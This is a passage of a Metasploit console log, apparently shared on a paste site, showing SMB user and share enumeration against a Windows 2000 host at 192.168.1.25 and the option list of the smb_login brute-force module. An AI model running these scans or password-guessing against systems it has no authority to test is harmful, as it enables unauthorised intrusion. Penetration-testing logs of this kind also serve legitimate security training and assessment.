  2722.  
  2723. Name Current Setting Required Description
  2724. ---- --------------- -------- -----------
  2725. RHOSTS yes The target address range or CIDR identifier
  2726. SMBDomain . no The Windows domain to use for authentication
  2727. SMBPass no The password for the specified username
  2728. SMBUser no The username to authenticate as
  2729. THREADS 1 yes The number of concurrent threads
  2730.  
  2731. msf auxiliary(scanner/smb/smb_enumusers) > use auxiliary/scanner/smb/smb_enumshares
  2732. msf auxiliary(scanner/smb/smb_enumshares) > show options
  2733.  
  2734. Module options (auxiliary/scanner/smb/smb_enumshares):
  2735.  
  2736. Name Current Setting Required Description
  2737. ---- --------------- -------- -----------
  2738. LogSpider 3 no 0 = disabled, 1 = CSV, 2 = table (txt), 3 = one liner (txt) (Accepted: 0, 1, 2, 3)
  2739. MaxDepth 999 yes Max number of subdirectories to spider
  2740. RHOSTS yes The target address range or CIDR identifier
  2741. SMBDomain . no The Windows domain to use for authentication
  2742. SMBPass no The password for the specified username
  2743. SMBUser no The username to authenticate as
  2744. ShowFiles false yes Show detailed information when spidering
  2745. SpiderProfiles true no Spider only user profiles when share = C$
  2746. SpiderShares false no Spider shares recursively
  2747. THREADS 1 yes The number of concurrent threads
  2748.  
  2749. msf auxiliary(scanner/smb/smb_enumshares) > set RHOSTS 192.168.1.25
  2750. RHOSTS => 192.168.1.25
  2751. msf auxiliary(scanner/smb/smb_enumshares) > run
  2752.  
  2753. [-] 192.168.1.25:139 - Login Failed: The SMB server did not reply to our request
  2754. [*] 192.168.1.25:445 - Windows 2000 Service Pack 0 - 4 (English)
  2755. [+] 192.168.1.25:445 - IPC$ - (I) Remote IPC
  2756. [+] 192.168.1.25:445 - ADMIN$ - (DS) Remote Admin
  2757. [+] 192.168.1.25:445 - C$ - (DS) Default share
  2758. [*] Scanned 1 of 1 hosts (100% complete)
  2759. [*] Auxiliary module execution completed
  2760. msf auxiliary(scanner/smb/smb_enumshares) > use auxiliary/scanner/smb/smb_login
  2761. msf auxiliary(scanner/smb/smb_login) > show options
  2762.  
  2763. Module options (auxiliary/scanner/smb/smb_login):
  2764.  
  2765. Name Current Setting Required Description
  2766. ---- --------------- -------- -----------
  2767. ABORT_ON_LOCKOUT false yes Abort the run when an account lockout is detected
  2768. BLANK_PASSWORDS false no Try blank passwords for all users
  2769. BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
  2770. DB_ALL_CREDS false no Try each user/password couple stored in the current database
  2771. DB_ALL_PASS false no Add all passwords in the current database to the list
  2772. DB_ALL_USERS false no Add all users in the current database to the list
  2773. DETECT_ANY_AUTH false no Enable detection of systems accepting any authentication
  2774. DETECT_ANY_DOMAIN false no Detect if domain is required for the specified user
  2775. PASS_FILE no File containing passwords, one per line
  2776. PRESERVE_DOMAINS true no Respect a username that contains a domain name.
  2777. Proxies no A proxy chain of format type:host:port[,type:host:port][...]
  2778. RECORD_GUEST false no Record guest-privileged random logins to the database
  2779. RHOSTS yes The target address range or CIDR identifier
  2780. RPORT 445 yes The SMB service port (TCP)
  2781. SMBDomain . no The Windows domain to use for authentication
  2782. SMBPass no The password for the specified username
  2783. SMBUser no The username to authenticate as
  2784. STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
  2785. THREADS 1 yes The number of concurrent threads
  2786. USERPASS_FILE no File containing users and passwords separated by space, one pair per line
  2787. USER_AS_PASS false no Try the username as the password for all users
  2788. USER_FILE no File containing usernames, one per line
  2789. VERBOSE true yes Whether to print output for all attempts
  2790.  
  2791. msf auxiliary(scanner/smb/smb_login) >
Add Comment
Please, Sign In to add comment